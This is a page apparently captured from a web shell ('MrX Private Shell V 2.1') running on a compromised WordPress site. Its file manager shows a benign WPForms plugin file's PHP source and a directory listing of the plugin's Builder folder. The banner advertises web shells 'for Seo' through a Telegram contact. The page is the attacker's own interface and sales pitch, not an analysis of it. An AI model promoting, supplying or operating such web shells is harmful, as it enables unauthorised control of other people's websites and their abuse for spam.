__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WPForms\Admin\Builder;
/**
* Image Upload functionality for the Form Builder Settings.
*
* @since 1.9.7.3
*/
class ImageUpload {
/**
* Initialize class.
*
* @since 1.9.7.3
*/
public function init(): void {
$this->hooks();
}
/**
* Register hooks.
*
* @since 1.9.7.3
*/
public function hooks(): void {
add_action( 'wpforms_builder_enqueues', [ $this, 'enqueues' ] );
}
/**
* Enqueue assets for the Form Builder.
*
* @since 1.9.7.3
*/
public function enqueues(): void {
$min = wpforms_get_min_suffix();
wp_enqueue_script(
'wpforms-builder-settings-image-upload',
WPFORMS_PLUGIN_URL . "assets/js/admin/builder/image-upload{$min}.js",
[ 'wp-util', 'wpforms-builder-settings' ],
WPFORMS_VERSION,
true
);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Ajax | Folder | 0775 |
|
|
| Notifications | Folder | 0775 |
|
|
| Settings | Folder | 0775 |
|
|
| Addons.php | File | 10.16 KB | 0775 |
|
| AntiSpam.php | File | 12.49 KB | 0775 |
|
| ContextMenu.php | File | 953 B | 0775 |
|
| Help.php | File | 53.34 KB | 0775 |
|
| HelpCache.php | File | 1.16 KB | 0775 |
|
| ImageUpload.php | File | 789 B | 0775 |
|
| Shortcuts.php | File | 3.23 KB | 0775 |
|
| TemplateSingleCache.php | File | 5.38 KB | 0775 |
|
| Templates.php | File | 35.32 KB | 0775 |
|
| TemplatesCache.php | File | 5.66 KB | 0775 |
|